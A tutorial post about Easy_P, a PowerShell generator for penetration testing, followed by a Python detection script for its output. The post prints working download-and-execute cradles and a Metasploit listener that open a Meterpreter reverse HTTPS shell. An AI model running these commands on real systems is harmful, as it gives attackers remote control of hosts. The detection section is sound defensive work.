玖叶教程网


Easy_P: a helper tool for generating commonly used PowerShell code

PowerShell is powerful, and not only for system administration. During day-to-day penetration testing, to get past firewalls and for other reasons, we need PowerShell scripts to help us complete the engagement, which is difficult for anyone unfamiliar with PowerShell scripting. Fortunately someone has already thought of this and written a helper Python script that automatically generates some commonly used PowerShell.

Easy_P GitHub address: https://github.com/cheetz/Easy-P.git

First, the project description:

Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the user's needs.

PowerShell/WMI Generator

=========================================================

[Easy_P ASCII-art banner]

Easy_P | A Powershell / WMI Command Generator.

Written by Peter Kim <Author, The Hacker Playbook>

<CEO, Secure Planet LLC>

==================================================Easy-P==

-----------------------------------------------------

[1] Privilege Escalation

[2] Lateral Movement

[3] Keylogging

[4] PowerShell Meterpreter

[5] Change Users Execution Policy

[6] Powershell 101

[7] Base64 Encode a PowerShell Script

[8] Mimikatz - Passwords from Memory

[99] Exit/Quit

-----------------------------------------------------

We choose option 4 to generate a reverse Meterpreter script:

Select An Option: 4

[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell. Original: https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1

LHOST: 192.168.1.103

LPORT: 55555

[*]Download from internet and execute:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force

[*]Run from a local copy of the script:

powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force}"

[*]Base64 encoded version download and execute:

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [base64 blob omitted]

[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your Kali box and load your handler with msfconsole -r listener.rc

use multi/handler

set payload windows/meterpreter/reverse_https

set LHOST 192.168.1.103

set LPORT 55555

set ExitOnSession false

exploit -j

As you can see, the tool generates the PowerShell script in three forms: download-and-execute from the network, execution from a local copy, and a Base64-encoded form. The remaining functions are left for readers to explore on their own; for reasons of length they are not covered here.
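As an added defender-side example (not part of the original post or of Easy_P itself), the following Python script scores process-creation command lines against the three shapes Easy_P emits: the download cradle, the local Import-Module call, and the -enc form, which it decodes before scoring. The log lines are constructed, and the host and IP values in them are placeholders.

```python
import re
import base64

# Constructed sample command lines (assumption: the format mirrors the CommandLine
# field of a Sysmon Event ID 1 or Windows 4688 record). The first three mirror the
# three forms Easy_P prints; the last is a benign scheduled admin script.
_ENC_BLOB = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x.ps1')".encode("utf-16le")
).decode()
SAMPLE_CMDLINES = [
    "Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.0.2.10 -Lport 55555 -Force",
    'powershell.exe -exec bypass -Command "& {Import-Module .\\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.0.2.10 -Lport 55555 -Force}"',
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + _ENC_BLOB,
    "powershell.exe -NoProfile -File C:\\Scripts\\Backup-Logs.ps1",
]

# Each indicator on its own is weak; the combination is what Easy_P's output looks like.
SUSPICIOUS_PATTERNS = {
    "exec_policy_bypass": re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"IEX\b.*DownloadString|DownloadString.*IEX", re.I),
    "shellcode_injection": re.compile(r"Invoke-Shellcode|meterpreter", re.I),
}
# PowerShell accepts -e, -ec, -enc and -encodedcommand; the argument is Base64 of UTF-16LE.
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -enc payload, or None if absent or not valid Base64/UTF-16LE."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_cmdline(cmdline):
    """Return (score, hit_names). The decoded -enc payload is scored together with the raw line."""
    hits = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
        text = cmdline + " " + decoded
    hits.extend(name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text))
    return len(hits), hits


def triage(cmdlines, threshold=2):
    """Return [(cmdline, hits)] for lines with at least `threshold` indicators."""
    return [(c, h) for c in cmdlines for s, h in [score_cmdline(c)] if s >= threshold]
```

Running `triage(SAMPLE_CMDLINES)` flags the three Easy_P-style lines and leaves the backup script alone; in production the same scoring would run over the CommandLine field of your process-creation telemetry.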
